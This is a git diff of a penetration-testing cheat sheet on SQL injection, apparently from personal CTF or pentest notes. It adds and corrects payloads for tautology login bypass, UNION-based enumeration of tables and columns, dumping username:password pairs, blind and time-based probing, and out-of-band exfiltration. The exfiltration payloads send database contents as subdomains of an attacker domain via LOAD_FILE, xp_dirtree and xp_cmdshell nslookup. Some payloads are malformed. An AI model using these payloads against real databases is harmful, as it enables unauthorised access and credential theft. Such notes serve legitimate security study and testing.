cleanup and some examples

Exploits/Databases/SQL Injection.md

@@ -33,7 +33,7 @@ by just putting in a single quote
 http://example.com/index.php?id='
 ```
 
-**Incase of client side sanitization craft the URL instead of using the form!!!**
+**In case of client side sanitization craft the URL instead of using the form!!!**
 
 ## In-Band SQLi
 
@@ -42,8 +42,10 @@ Terminate the string of the SQL command via `'` and resolve via tautology like
 and delivers a response containing DB content
 
 ```sql
-SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
+SELECT * FROM users WHERE username = admin AND password = '' or 1=1; -- -
-SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
+SELECT * FROM users WHERE username = admin AND password = '' and 1=1 -- -
+SELECT * FROM users WHERE username = admin AND password = '' or 1=1 --+
+SELECT * FROM users WHERE username = admin AND password = "" or 1=1; --+
 ```
 
 There are further methods of SQL injection following below.
@@ -63,7 +65,7 @@ id=(SELECT banner FROM v$version) # oracle
 Union based injections is an incremental and cautios approach.
 Start by trying to provoke errors to validate a possible injection.
 
-* __First method__ check by order until error occurs
+__First method__ check by order until error occurs
 
 ```sql
 ' order by 1 -- -
@@ -73,7 +75,7 @@ Start by trying to provoke errors to validate a possible injection.
 
 Check the number of columns by inserting NULL values one after another.
 
- __Second method__ fuzzing NULL values, followed by fuzzing data types
+__Second method__ fuzzing NULL values, followed by fuzzing data types
 
 Check number of cols
 
@@ -96,20 +98,30 @@ Check which one contains String values
 Retrieve content, for cols as an example, or dump database
 
 ```sql
+' UNION SELECT NULL, NULL, database(), NULL
 ' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- - //
 ' UNION SELECT NULL,username,password,NULL FROM users -- - //
 ```
 
 Retrieve content by union poking the count and order of columns, afterwards
-extracting tables via
+extracting tables via:
 
 ```sh
 0 union select null, null, database()
 0 union select null, null, group_concat(table_name) from information_schema.tables where table_schema = 'found_db'
 0 union select null, null, group_concat(column_name) from information_schema.columns where table_name = 'found_tablename'
-0 union select null, null, group_concat(username, ':', password from found_tablename
+0 union select null, null, group_concat(username, ':', password SEPARATOR '<br>') from found_tablename;
 ```
 
+Function `group_concat` concatenates all rows into a single string.
+
+* `information_schema.tables` acts on every available table of a database.
+* `information_schema.columns`
+
+Option `table_schema` contains the name of the database, `table_name` the name
+of the tables inside the database and `column_name` the names of the columns of
+a selected table.
+
 The examples above contain methods of retrieving table name, column names. The
 last example uses the information returned to inject the correct column names
 so the acutal content of them are retrieved. Further examples under [SQL
@@ -128,7 +140,7 @@ Extract tables
 SQLite specifica
 
 ```sql
-' UNION SELECT sql, sql FROM sqlite_master -- -
+UNION SELECT sql, sql FROM sqlite_master -- -
 ```
 
 ```sql
@@ -165,10 +177,24 @@ SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
 ```
 
 Blind boolean base substring fuzzes one char at a time, by inspecting the
-return value after each inserted char.
+return value after each inserted char. This can be used if the response
+includes some kind of boolean statement about the existence of a database or
+table.
+
+Extract database:
 
 ```sql
-' UNION SELECT null,null,null where database() like 'da%';-- -
+UNION SELECT null,null,null where database() LIKE '%'; -- -
+```
+
+```sql
+UNION SELECT null,null,null where database() like 'da%';-- -
+```
+
+If the database name is known fuzz the tablename:
+
+```sql
+UNION SELECT null,null,null FROM information_schema.tables WHERE table_schema = 'db_name' AND table_name LIKE 'a%'; -- -
 ```
 
 ### Time Based
@@ -177,8 +203,9 @@ Checking input blindly via sleep() function. Count the number of columns in
 this way. on success, the sleep(5) function executes
 
 ```sql
-' union select sleep(3), null; -- -
+UNION SELECT sleep(3), null; -- -
-' SELECT * from users where id = 420; IF (69=69) WAITFOR DELAY '00:00:03' -- -
+UNION SELECT sleep(3),1 null; -- - one column
+SELECT * FROM users WHERE id = 420; IF (69=69) WAITFOR DELAY '00:00:03' -- -
 ```
 
 ### Blind injection
@@ -250,6 +277,21 @@ original SQLi payload.
 Check if an inserted SQL query may be set instead of regular data, e.g. instead
 of a name and let it be queried via a second step.
 
+### DNS Resolution Including Exfiltrated Data
+
+Read a file on Windows via `LOAD_FILE()` and add its content as a subdomain, so the DNS request will contain the exfiltrated data.
+
+```sql
+SELECT LOAD_FILE(CONCAT('\\\\', (SELECT database()), '.mydomain.com\\share'));
+```
+
+Another possibility of data extraction is `xp_dirtree` which triggers DNS
+resolution for the target server:
+
+```sql
+EXEC master..xp_dirtree '\\mydomain.com\share';
+```
+
 ### Other Communication Channels
 
 Instead of a direct response there may be indirect results possible, like the following.
@@ -257,7 +299,7 @@ Instead of a direct response there may be indirect results possible, like the fo
 Write to a file via `OUTFILE`.
 
 ```sql
-SELECT passwords FROM users INTO OUTFILE '/dev/shm/passwords.txt`
+SELECT passwords FROM users INTO OUTFILE '/dev/shm/passwords.txt';
 ```
 
 Executing shell commands for extraction through `xp_cmdshell` on MYSQL.
@@ -267,6 +309,10 @@ exfiltration target.
 
 Other exfiltration targets may be DNS or SMB servers.
 
+```sql
+EXEC xp_cmdshell 'nslookup data.mydomain.com';
+```
+
 On the attacker side start an SMB server.
 
 ```sh